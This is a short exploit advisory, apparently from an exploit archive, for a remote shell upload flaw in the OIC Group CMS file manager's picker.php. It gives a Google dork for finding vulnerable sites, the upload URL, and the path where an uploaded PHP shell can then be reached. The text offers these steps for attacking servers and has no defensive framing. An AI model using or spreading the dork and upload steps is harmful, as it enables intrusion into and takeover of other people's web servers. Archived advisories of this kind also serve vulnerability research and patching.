OIC Group suffers from a shell upload vulnerability.
29c5a4aec1e3a86ef25761568157884a3eaca2a2cc44a6ff173a959324987adb
# Exploit Title: <picker.php> Remote SHELL Upload
# Date: 06-06-2010
# Author: kannibal615
# Software Link: N/A
# Version: 2009
# Tested on: PHP
# CVE : N/A
# Code :
@@ @@ @@@@@@ @@ @@ @@@@ @@@@@@@ @@ @@ @@@@@@@ @@@@@
@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @@@ @@@@@@@@ @@ @@ @@ @@@@ @@@@@@ @@ @@
@@ @@ @@ @@@ @@@@@@@@ @@@@@@@@ @@ @@ @@ @@@@@@ @@ @@
@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@@@@@ @@ @@ @@ @@ @@@@@@@ @@ @@ @@@@@@@ @@ @@
@ @@@@ @ @@@@@
@ @ @ @ @ @
@@ @@@@ @@@@@ @ @@@@@
@ @ @ @ @ @
@ @ @@@@@ @@@ @@@@
kannibal615 > zn@live.de
###################################################################################
#
# EXPLOIT >> OIC Group Remote Shell Upload
#
###################################################################################
# Found By : kannibal615
# website : www.vbhacker.net/vb
# email : zn[at]live[dot]de
#
# Thanks to : THE PIRATOR
# : Pc-InSeCt / emptyzero
# : DAK / l3G3NDS / m0j4h3d
# : V!Ru$_T4ckJ3n / __MiM0__
# : ruqa / PrideArabs / DIESEL
# : yassine_hell / mu$lim
# : ALL VBHACKER MEMBERS
##################################################################################
#
# [+] Script Information :
#
# Copyright (c) 2008-2009 OIC Group, Inc.
# Copyright (c) 2009 Maxim Mueller
# Written and Designed by James Hunt
#
# [+] Google Dork :
#
# inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
#
# [+] Demo
#
# http://[localhost]/modules/filemanagermodule/actions/picker.php?id=0
#
# [+] Upload Your PHP Shell ++
#
# K615.php
#
# [+] Get It From Here
#
# http://[localhost]/files/K615.php
#
#
##################################################################################
#
# The End
#
# La Ilah Illa Allah Muhamed Rasoul Allah
#
# Copyright 2010 kannibal615
#
# Vbahacker.net Forums
#
# Exploit-db.com
#
###################################################################################